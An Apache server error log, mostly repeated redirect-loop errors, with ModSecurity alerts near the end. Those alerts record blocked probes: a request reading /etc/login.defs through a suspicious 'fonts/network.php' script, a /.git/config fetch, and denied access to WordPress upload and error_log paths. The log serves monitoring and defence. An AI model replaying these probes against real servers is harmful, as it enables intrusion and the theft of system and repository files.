[Mon May 11 16:27:54.261600 2026] [core:error] [pid 1412074:tid 1412088] [client 18.180.54.2:54002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:54.261632 2026] [core:error] [pid 1412074:tid 1412088] [client 18.180.54.2:54002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:54.986973 2026] [core:error] [pid 1412074:tid 1412082] [client 18.180.54.2:54036] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:54.987003 2026] [core:error] [pid 1412074:tid 1412082] [client 18.180.54.2:54036] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:55.303089 2026] [core:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:55.303123 2026] [core:error] [pid 1416109:tid 1416144] [client 18.180.54.2:54026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:55.726980 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:55.727010 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:54048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.002677 2026] [core:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.002713 2026] [core:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.467363 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.467400 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.686177 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:56.686209 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.203100 2026] [core:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.203138 2026] [core:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.363905 2026] [core:error] [pid 1411099:tid 1411112] [client 18.180.54.2:54086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.363942 2026] [core:error] [pid 1411099:tid 1411112] [client 18.180.54.2:54086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.914770 2026] [core:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:57.914818 2026] [core:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.076525 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.076561 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.604256 2026] [core:error] [pid 1416109:tid 1416131] [client 18.180.54.2:55686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.604290 2026] [core:error] [pid 1416109:tid 1416131] [client 18.180.54.2:55686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.806735 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:55694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:58.806770 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:55694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:59.326244 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:55700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:59.326285 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:55700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:59.545146 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:55716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:59.545193 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:55716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.027603 2026] [core:error] [pid 1412074:tid 1412080] [client 18.180.54.2:55730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.027636 2026] [core:error] [pid 1412074:tid 1412080] [client 18.180.54.2:55730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.289085 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:55738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.289129 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:55738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.707099 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:55742] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.707135 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:55742] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.990403 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:55756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:00.990435 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:55756] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:01.387307 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:55762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:01.387345 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:55762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:01.713655 2026] [core:error] [pid 1412074:tid 1412097] [client 18.180.54.2:55764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:01.713688 2026] [core:error] [pid 1412074:tid 1412097] [client 18.180.54.2:55764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.101487 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.101523 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.456693 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:55772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.456722 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:55772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.805597 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:55784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:02.805635 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:55784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.199328 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:55800] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.199363 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:55800] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.533802 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:55814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.533836 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:55814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.902074 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:55824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:03.902103 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:55824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:04.287365 2026] [core:error] [pid 1411099:tid 1411102] [client 18.180.54.2:55830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:04.287410 2026] [core:error] [pid 1411099:tid 1411102] [client 18.180.54.2:55830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:04.620083 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:55842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:04.620121 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:55842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.030413 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:55852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.030446 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:55852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.364226 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:55858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.364261 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:55858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.776100 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:55868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:05.776138 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:55868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.106655 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:55882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.106688 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:55882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.520537 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:55886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.520579 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:55886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.847811 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:55890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.847848 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:55890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:06.904956 2026] [security2:error] [pid 1411055:tid 1411077] [client 185.213.245.160:54057] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHndkWKUxpmnkK7zHx85AAAARQ"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:28:07.223611 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:55906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:07.223641 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:55906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:07.593980 2026] [core:error] [pid 1411055:tid 1411061] [client 18.180.54.2:55914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:07.594012 2026] [core:error] [pid 1411055:tid 1411061] [client 18.180.54.2:55914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:07.940017 2026] [core:error] [pid 1411099:tid 1411103] [client 18.180.54.2:55918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:07.940054 2026] [core:error] [pid 1411099:tid 1411103] [client 18.180.54.2:55918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:08.334932 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:55926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:08.334968 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:55926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:09.038785 2026] [core:error] [pid 1412074:tid 1412077] [client 18.180.54.2:42486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:09.038820 2026] [core:error] [pid 1412074:tid 1412077] [client 18.180.54.2:42486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:28:40.278457 2026] [authz_core:error] [pid 1411055:tid 1411062] [client 194.163.167.152:50332] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-content/uploads/wpcf7_uploads/, referer: binance.com
[Mon May 11 16:28:54.025042 2026] [security2:error] [pid 1411201:tid 1411258] [client 157.55.39.201:22452] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/languages/%3$s"] [unique_id "agHnpvy_GXSWIKeli0vzWwAAAIw"]
[Mon May 11 16:29:33.423948 2026] [authz_core:error] [pid 1411201:tid 1411267] [client 194.163.167.152:57673] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 16:29:37.994192 2026] [security2:error] [pid 1411099:tid 1411115] [client 43.134.1.185:39560] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHn0Q-Qm4vhlWBPlMi7ggAAAA8"]
[Mon May 11 16:29:39.136046 2026] [authz_core:error] [pid 1411099:tid 1411106] [client 194.163.167.152:57428] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 16:31:11.927441 2026] [security2:error] [pid 1412074:tid 1412083] [client 216.73.216.110:18134] ModSecurity: Warning. Matched phrase "etc/login.defs" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/login.defs found within ARGS:filesrc: /etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHoLzJnyuKVXoStDha3FQAAAEc"]
[Mon May 11 16:31:11.928277 2026] [security2:error] [pid 1412074:tid 1412083] [client 216.73.216.110:18134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHoLzJnyuKVXoStDha3FQAAAEc"]
[Mon May 11 16:31:12.015511 2026] [security2:error] [pid 1412074:tid 1412083] [client 216.73.216.110:18134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHoLzJnyuKVXoStDha3FQAAAEc"]
[Mon May 11 16:31:34.140714 2026] [core:error] [pid 1411201:tid 1411246] [client 185.191.171.12:20412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:31:34.140751 2026] [core:error] [pid 1411201:tid 1411246] [client 185.191.171.12:20412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:31:51.610534 2026] [:error] [pid 1416109:tid 1416134] [client 47.128.119.76:34290] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 16:32:06.178688 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.26.34.241:52948] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "hosting.totalcloud.fr"] [uri "/.git/config"] [unique_id "agHoZjJnyuKVXoStDha3gQAAAEQ"]
[Mon May 11 16:32:06.178921 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.26.34.241:52948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "hosting.totalcloud.fr"] [uri "/.git/config"] [unique_id "agHoZjJnyuKVXoStDha3gQAAAEQ"]
[Mon May 11 16:32:06.180884 2026] [security2:error] [pid 1412074:tid 1412080] [client 34.26.34.241:52948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "hosting.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agHoZjJnyuKVXoStDha3gQAAAEQ"]
